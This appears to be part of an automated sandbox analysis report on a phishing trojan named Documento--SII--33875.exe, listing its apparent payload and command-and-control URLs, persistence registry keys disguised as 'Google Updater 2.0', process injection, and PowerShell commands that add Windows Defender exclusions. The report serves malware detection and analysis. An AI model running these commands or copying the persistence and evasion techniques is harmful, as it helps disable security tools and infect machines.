                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                      Source: explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmp | String found in binary or memory: http://estrelladamm.icu/get.php__vbaVarSetVar
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://estrelladamm.icu/old/GetDataAVK.exe
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://estrelladamm.icu/old/GetDataAVK.exe2
                      Source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp | String found in binary or memory: http://estrelladamm.icu/old/get.php
                      Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
                      Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://rusianlover.icu/forum/logout.php
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://rusianlover.icu/forum/logout.php?id=2442663
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://rusianlover.icu/forum/logout.php?id=2442663t
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://rusianlover.icu/forum/logout.php?id=7086675
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: http://rusianlover.icu/forum/logout.php?pid=925
                      Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp | String found in binary or memory: http://www.apple.com/
                      Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                      Source: explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmp | String found in binary or memory: https://l0ioz.icu/pub/bin.exe
                      Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
                      Source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp | String found in binary or memory: https://www.mql5.com/ru/articles/download/69/system_data_sqlite.zip1
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknown | HTTPS traffic detected: 104.21.55.228:443 -> 192.168.2.5:49717 version: TLS 1.2

                      System Summary:

                      Contains functionality to create processes via WMI
                      Source: Documento--SII--33875.exe, 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp | Binary or memory string: EP91%s.manifest%s.configCpuFlushInstructionCache_wcslwr_wcsnicmpwcsstrwcsncpymemsetmemcpyNtQueryInformationThreadNtQueryInformationProcessNtCloseObject ErrorNULL PortUsername required, but NULLTime limit is too shortAlloc Errorhiheh1Windows\CurrentVersion\RunWindows NT\CurrentVersion\Image File Execution Options\%sSOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\PackagesKB%uInstallNamentkrnl/c start "" "%s" /%s "%s" . &CLS . &echo Fixing issues ...&ECHO Issues fixed! . &exit%pRtlQueryElevationFlagsEnableLUA/c start "" "%s" /%s&EXITwbem\WMIC.exeprocess call create "%s %s" SSDPSRVTCPWindows 3.1 Update Service
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sample | Static PE information: Filename: Documento--SII--33875.exe
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: 11_2_0043D9E7 GetProcAddress,_lopen,GetProcessHeap,RtlAllocateHeap,_hread,GetProcessHeap,RtlAllocateHeap,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,GetCommandLineA,CreateProcessA,GetProcAddress,GetProcAddress,GetModuleFileNameA,_lopen,GetProcessHeap,RtlAllocateHeap,_hread,_hread,ResumeThread,GetCurrentProcess,VirtualAllocEx,GetProcessHeap,HeapAlloc,GetProcAddress,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 1_2_004661F0
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 1_2_00467340
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: 11_2_004661F0
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: 11_2_00467340
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: 11_2_0044F314
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe 02DCE269070BFEC91E4F01A67D774167F8208F17211E8027D8A7FE3DC62A356B
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe EB7CEA525ECEF555356C13B6948C21DDAD4B8A622FF4C027F285C0C096570253
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Process token adjusted: Load Driver
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Process token adjusted: Security
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: String function: 004294FB appears 45 times
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: String function: 0042919F appears 42 times
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: String function: 004294FB appears 45 times
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: String function: 0042919F appears 45 times
                      Source: iom7q73oi.exe.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Documento--SII--33875.exe, 00000001.00000000.227179544.00000000004A0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameMs5io.exeDVarFileInfo$ vs Documento--SII--33875.exe
                      Source: Documento--SII--33875.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: iom7q73oi.exe, 00000022.00000002.315466729.0000000000409000.00000004.00020000.sdmp | Binary or memory string: f0 @*\AC:\Users\the\Downloads\SP\[lab]Down\Vb-codes\vb6\downLow3\DownLow3.vbp
                      Source: explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmp | Binary or memory string: @*\AC:\Users\the\Downloads\SP\[lab]Down\Vb-codes\vb6\downLow3\DownLow3.vbp
                      Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@26/13@35/4
                      Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
                      Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe
                      Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Process created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\SysWOW64\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: Documento--SII--33875.exe | Virustotal: Detection: 49%
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | File read: C:\Users\user\Desktop\Documento--SII--33875.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
                      Source: unknown | Process created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
                      Source: unknown | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: unknown | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknown | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknown | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknown | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknown | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknown | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe /suac
                      Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                      Source: unknown | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Process created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe /suac
                      Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                      Source: C:\Windows\SysWOW64\explorer.exe | Process created: unknown unknown
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Process created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Documento--SII--33875.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb} source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
                      Source: Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\skunk\Desktop\SPCL\PPP\proyecto polinesia francesa\extractor\new\GetDataAVK\2\GetDataAVK\obj\Debug\GetDataAVK.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp

                      Data Obfuscation:

                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Unpacked PE file: 2.2.Documento--SII--33875.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Unpacked PE file: 14.2.9sek3aw7533q9.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Unpacked PE file: 21.2.9sek3aw7533q9.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Unpacked PE file: 32.2.9sek3aw7533q9.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Unpacked PE file: 2.2.Documento--SII--33875.exe.400000.0.unpack
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Unpacked PE file: 14.2.9sek3aw7533q9.exe.400000.0.unpack
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Unpacked PE file: 21.2.9sek3aw7533q9.exe.400000.0.unpack
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Unpacked PE file: 32.2.9sek3aw7533q9.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 1_2_00468B80 InterlockedIncrement,LoadLibraryA,GetProcAddress,OutputDebugStringA,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,WriteFile,OutputDebugStringA,InterlockedDecrement,InterlockedDecrement,
                      Source: Documento--SII--33875.exe | Static PE information: section name: .rdaals2
                      Source: 9sek3aw7533q9_1.exe.3.dr | Static PE information: section name: .rdaals2
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 1_2_004659F0 push eax; ret
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Code function: 1_2_004659F0 push eax; ret
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: 11_2_004659F0 push eax; ret
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe | Code function: 11_2_004659F0 push eax; ret
                      Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe
                      Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                      Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | PE file moved: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe

                      Boot Survival:

                      Creates an undocumented autostart registry key
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\9sek3aw7533q9.exe DisableExceptionChainValidation
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\9sek3aw7533q9.exe DisableExceptionChainValidation
                      Source: C:\Windows\SysWOW64\explorer.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe Debugger
                      Source: C:\Windows\SysWOW64\explorer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0
                      Source: C:\Windows\SysWOW64\explorer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0
                      Source: C:\Windows\SysWOW64\explorer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0
                      Source: C:\Windows\SysWOW64\explorer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0
                      Source: C:\Windows\SysWOW64\explorer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0
                      Source: C:\Windows\SysWOW64\explorer.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0

                      Hooking and other Techniques for Hiding and Protection:

                      Creates files in alternative data streams (ADS)
                      Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe:14EDFC78
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exe | File opened: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe:Zone.Identifier read attributes | delete
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe | File opened: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe:Zone.Identifier read attributes | delete
                      Overwrites Windows DLL code with PUSH RET codes
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 2244 base: 77A077F0 value: 68 F3 81 78 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 240 base: 77A077F0 value: 68 F3 81 CA 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 4644 base: 77A077F0 value: 68 F3 81 30 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 3060 base: 77A077F0 value: 68 F3 81 C4 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 4668 base: 77A077F0 value: 68 F3 81 C0 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 4612 base: 77A077F0 value: 68 F3 81 87 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 2588 base: 77A077F0 value: 68 F3 81 F0 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 1688 base: 77A077F0 value: 68 F3 81 00 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 2248 base: 77A077F0 value: 68 F3 81 D0 03 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 2188 base: 77A077F0 value: 68 F3 81 19 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 3332 base: 77A077F0 value: 68 F3 81 5A 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 2036 base: 77A077F0 value: 68 F3 81 13 04 C3
                      Source: C:\Windows\SysWOW64\explorer.exeMemory written: PID: 7416 base: 77A077F0 value: 68 F3 81 B6 05 C3
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess information set: NOOPENFILEERRORBOX
